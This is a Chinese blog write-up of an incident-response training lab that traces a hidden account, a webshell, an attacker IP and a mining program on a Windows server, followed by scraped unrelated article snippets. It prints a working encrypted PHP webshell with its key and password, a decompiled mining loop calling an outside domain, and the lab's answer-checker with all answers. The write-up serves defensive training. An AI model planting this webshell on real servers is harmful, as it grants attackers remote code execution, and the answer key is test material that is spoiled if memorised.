news 2026/4/15 16:41:14

应急响应靶场 - web1

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
应急响应靶场 - web1

前景需要:

小李在值守的过程中,发现有CPU占用飙升,出于胆子小,就立刻将服务器关机,这是他的服务器系统,请你找出以下内容,并作为通关条件:

1.攻击者的shell密码

2.攻击者的IP地址

3.攻击者的隐藏账户名称

4.攻击者挖矿程序的矿池域名

用户:

administrator

密码

Zgsf@admin.com

一、题目要求

  1. 攻击者的 shell 密码
  2. 攻击者的 IP 地址
  3. 攻击者创建的隐藏账户名称
  4. 攻击者挖矿程序使用的矿池域名(仅域名)

二、应急响应总体思路

真实应急响应中,一般遵循以下顺序:

  1. 账户异常排查(最快、最明显)
  2. Web 服务与 WebShell 排查
  3. 日志溯源(锁定攻击 IP)
  4. 恶意程序与挖矿行为确认
  5. 逆向分析恶意程序,提取矿池信息

三、隐藏账户排查(问题 3)

3.1 为什么先查账户?

攻击者在 Web 入侵成功后,最稳定的持久化方式就是创建系统账户,这样即使 WebShell 被删,也能重新登录系统。

3.2 查看本地用户和组

使用图形界面方式:

Win + R → lusrmgr.msc

打开 “本地用户和组 → 用户”,查看所有用户

3.3 发现隐藏账户

在用户列表中发现一个明显异常用户:

hack168$
判断依据:
  • $结尾(Windows 中常用于隐藏账户)
  • 非系统默认用户
  • 明显人为创建

攻击者的隐藏账户名称:hack168$

用命令确认:

$net user hack168$ 用户名 hack168$ 全名 注释 用户的注释 国家/地区代码 000 (系统默认值) 帐户启用 Yes 帐户到期 从不 上次设置密码 2024/2/26 23:01:13 密码到期 从不 密码可更改 2024/2/26 23:01:13 需要密码 Yes 用户可以更改密码 Yes 允许的工作站 All 登录脚本 用户配置文件 主目录 上次登录 2024/2/26 23:02:24 可允许的登录小时数 All 本地组成员 *Administrators *Users 全局组成员 *None 命令成功完成。

四、Web 服务排查与 WebShell 定位(问题 1)

4.1 确认 Web 环境

桌面存在 phpStudy / 小皮面板,说明该主机运行 Web 服务

通过浏览器访问本机 80 端口:

http://127.0.0.1

推断攻击者大概率通过 Web 上传漏洞 / Web RCE 入侵

phpStudy路径:

4.2 使用 D 盾扫描 Web 目录

www目录使用 D 盾 WebShell 查杀工具扫描:

获得webshell路径:C:\phpStudy_pro\WWW\content\plugins\tips\shell.php

4.3 查看 WebShell 内容

打开 WebShell 文件,发现典型一句话木马结构,并在代码中直接写死了密码:

<?php @error_reporting(0); session_start(); $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond $_SESSION['k']=$key; session_write_close(); $post=file_get_contents("php://input"); if(!extension_loaded('openssl')) { $t="base64_"."decode"; $post=$t($post.""); for($i=0;$i<strlen($post);$i++) { $post[$i] = $post[$i]^$key[$i+1&15]; } } else { $post=openssl_decrypt($post, "AES128", $key); } $arr=explode('|',$post); $func=$arr[0]; $params=$arr[1]; class C{public function __invoke($p) {eval($p."");}} @call_user_func(new C(),$params); ?>
$password = "rebeyond";

攻击者的 shell 密码:rebeyond

五、日志分析定位攻击者 IP(问题 2)

启动服务查看

5.1 为什么要看 Apache 日志?

既然确认是 WebShell 上传,那么攻击者的 IP 一定会出现在 Web 访问日志 中

5.2 Apache 日志路径

phpStudy 默认 Apache 日志路径:

C:\phpstudy_pro\Extensions\Apache2.4.39\logs\

重点文件:

access.log

5.3 分析 access.log

打开access.log,结合以下特征筛选:

  • POST 请求
  • 上传脚本
  • 访问 WebShell 文件
  • 请求参数异常

最终定位到攻击源 IP:

192.168.126.1

攻击者的 IP 地址:192.168.126.1

弱口令admin,123456能登录

六、挖矿行为确认与恶意程序定位

6.1 异常现象

在桌面操作过程中发现:

  • 运行某个可疑程序后
  • CPU 使用率瞬间 100%

这是非常典型的 挖矿行为特征

6.2 锁定挖矿程序

在隐藏账户hack168$的目录中发现可疑文件:

Kuang.exe

运行即拉满 CPU,基本可以确认:该程序为挖矿木马

七、逆向挖矿程序,提取矿池域名(问题 4)

7.1 为什么要逆向?

挖矿程序一定要连接矿池服务器,矿池地址通常:

  • 写死在代码中
  • 或以字符串形式存在

7.2 判断程序类型

使用file/ 观察行为后发现:

  • Kuang.exe为 PyInstaller 打包的 Python 程序

7.3 使用 PyInstaller 反编译

工具准备:

  • pyinstxtractor.py

执行:

python pyinstxtractor.py Kuang.exe

成功解包,得到.pyc文件

7.4 反编译 pyc

Kuang.pyc上传至 在线 pyc 反编译网站,还原为.py文件

# Decompiled with PyLingual (https://pylingual.io) # Internal filename: Kuang.py # Bytecode version: 3.8.0rc1+ (3413) # Source timestamp: 1970-01-01 00:00:00 UTC (0) import multiprocessing import requests def cpu_intensive_task(): while True: try: requests.get('http://wakuang.zhigongshanfang.top', timeout=10) except: pass if __name__ == '__main__': cpu_count = multiprocessing.cpu_count() processes = [multiprocessing.Process(target=cpu_intensive_task) for _ in range(cpu_count)] for process in processes: process.start() for process in processes: process.join()

在源码中发现如下关键字符串:

http://wakuang.zhigongshanfang.top

这是挖矿程序连接的矿池地址

挖矿程序的矿池域名:wakuang.zhigongshanfang.top

八.逆向题目exe

步骤同上

# Decompiled with PyLingual (https://pylingual.io) # Internal filename: '解题.py' # Bytecode version: 3.8.0rc1+ (3413) # Source timestamp: 1970-01-01 00:00:00 UTC (0) print('公众号:知攻善防实验室') print('欢迎使用知攻善防实验室-应急响应训练靶机解题系统') print('在此之前,您应该获取到以下信息') print('1.攻击者的shell密码') print('2.攻击者的IP地址') print('3.攻击者的隐藏账户名称') print('4.攻击者挖矿程序的矿池域名') num = input('你准备好了吗?(y or n)') if num == 'y': shellpass = input('请输入攻击者的shell密码:') if shellpass == 'rebeyond': print('题解正确!') IPadd = input('请输入攻击者的IP地址') if IPadd == '192.168.126.1': print('题解正确!') username = input('请输入攻击者的隐藏账户名称:') if username == 'hack168' or username == 'hack168$': print('题解正确!') wakuang = input('请输入攻击者挖矿程序的矿池域名:') if wakuang == 'wakuang.zhigongshanfang.top': print('题解正确!') print('恭喜您,该靶机已被您攻破!') print('恭喜您,该靶机已被您攻破!') print('恭喜您,该靶机已被您攻破!') print('恭喜您,该靶机已被您攻破!') # return None

直接能逆出答案

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/11 12:15:12

SGMICRO圣邦微 SGM706-SYS8G/TR SOP8 监控和复位芯片

特性 SGM706提供电源监控电路&#xff0c;可在电源上电、掉电和欠压情况下产生复位输出。当VCC低至1V时&#xff0c;复位输出仍可正常工作。还提供独立的看门狗监控电路。如果看门狗输入在1.6秒内未切换&#xff0c;则该电路将被激活。有一个1.25V阈值检测器&#xff0c;用于电…

作者头像 李华
网站建设 2026/4/16 11:02:14

加油机(有完整资料)

资料查找方式&#xff1a; 特纳斯电子&#xff08;电子校园网&#xff09;&#xff1a;搜索下面编号即可 编号&#xff1a; CP-51-2021-026 设计简介&#xff1a; 本设计是基于单片机的加油机系统&#xff0c;主要实现以下功能&#xff1a; LCD12864显示当前加油机&#xf…

作者头像 李华
网站建设 2026/4/16 12:20:57

好写作AI:别画“人物关系图”了!让AI帮你织一张会呼吸的角色网

当你论文里的角色还活在Excel表格里&#xff0c;隔壁同学的角色已经在AI里开始“爱恨情仇”了还在用箭头和方框&#xff0c;画那张永远理不顺的“人物关系图”吗&#xff1f;对于文学、剧本或叙事研究类论文&#xff0c;好写作AI能帮你把静态的“关系图”&#xff0c;变成动态的…

作者头像 李华
网站建设 2026/4/16 11:09:36

构建区域创新生态,推动科技成果转化新路径

在当今快速发展的时代&#xff0c;科技创新已成为推动经济社会发展的重要引擎。然而&#xff0c;在科技成果转化过程中&#xff0c;却存在着一系列瓶颈问题亟待解决。例如&#xff0c;科技成果供需信息不对称、转化渠道不畅通以及专业化服务能力不足等现象&#xff0c;严重制约…

作者头像 李华
网站建设 2026/4/16 11:03:48

高校院所科技成果转化的数智化破局之路

在当今创新驱动发展的时代&#xff0c;高校和科研院所作为科技创新的重要策源地&#xff0c;其科技成果向产业转化的能力直接关系到国家整体经济实力与竞争力。然而&#xff0c;在实际操作中&#xff0c;科技成果转化往往面临信息壁垒和供需不对称等诸多挑战。如何破解这些难题…

作者头像 李华